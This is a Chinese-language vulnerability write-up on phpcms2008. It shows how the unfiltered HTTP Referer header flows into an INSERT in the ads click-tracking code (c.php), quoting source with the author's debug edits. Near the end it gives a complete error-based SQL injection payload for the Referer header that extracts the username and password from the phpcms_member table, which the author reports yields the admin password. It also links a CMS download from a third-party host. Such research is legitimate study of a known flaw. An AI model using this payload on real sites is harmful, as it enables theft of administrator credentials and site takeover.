一、安装好phpcms2008,如下图:
CMS下载地址:http://sqdownd.rbread01.cn/down/1510935383_71914_ym.zip
phpcms2008 漏洞挖掘报错注入
进入 include/common.inc.php
define('HTTP_REFERER', isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''); //
这个不受GPC影响,不会被专一,多好的-----》利用一波
c.php
$id = intval($id);
$ads = $c_ads->get_info($id);
echo '------>'.HTTP_REFERER."<br/>";
if($ads)
{
$db->query("UPDATE ".DB_PRE."ads SET `clicks`=clicks+1 WHERE adsid=".$ads['adsid']);
$info['username'] = $_username;
$info['clicktime'] = time();
$info['ip'] = IP;
$info['adsid'] = $id;
$info['referer'] = HTTP_REFERER;
$year = date('ym',TIME);
$table = DB_PRE.'ads_'.$year;
$table_status = $db->table_status($table);
if(!$table_status) {
include MOD_ROOT.'include/create.table.php';
}
$db->insert($table, $info);
$url = strpos($ads['linkurl'], 'http://')===FALSE ? 'http://'.$ads['linkurl'] : $ads['linkurl'];
}
?>
phpcms\ads\include\ads.class.php
function get_info($adsid, $username = '')
{
$adsid = intval($adsid);
$this->adsid = $adsid;
if($username) $sql = " AND a.username='$username'";
echo "SELECT a.introduce AS ads_introduce,a.*, p.* FROM $this->table as a left join ".DB_PRE."ads_place as p on (a.placeid=p.placeid) WHERE a.adsid=$this->adsid $sql ";
die();
return $this->db->get_one("SELECT a.introduce AS ads_introduce,a.*, p.* FROM $this->table as a left join ".DB_PRE."ads_place as p on (a.placeid=p.placeid) WHERE a.adsid=$this->adsid $sql ");
}
SELECT a.introduce AS ads_introduce,a.*, p.* FROM phpcms_ads as a left join phpcms_ads_place as p on (a.placeid=p.placeid) WHERE a.adsid=1
接下来,改我们的referer提交值:
查询报错:爆出我们的用户名,密码
添加到referer:‘
更改代码:
构造以下sql语句,改成sql语句:
INSERT INTO `phpcms_ads_2007`(`username`,`clicktime`,`ip`,`adsid`,`referer`) VALUES('phpcms','1594132207','192.168.189.1','1','',(select 1 from (select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))#')')
更改referer,构造语句,成功获取后台管理密码。
referer: ',(select 1 from (select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))#')
注意:看了几个大牛写的,和我的都不一样,好像他们都是从referer处截断更改,一开始按照大牛的没有成功,自己分析最后构造语句如上: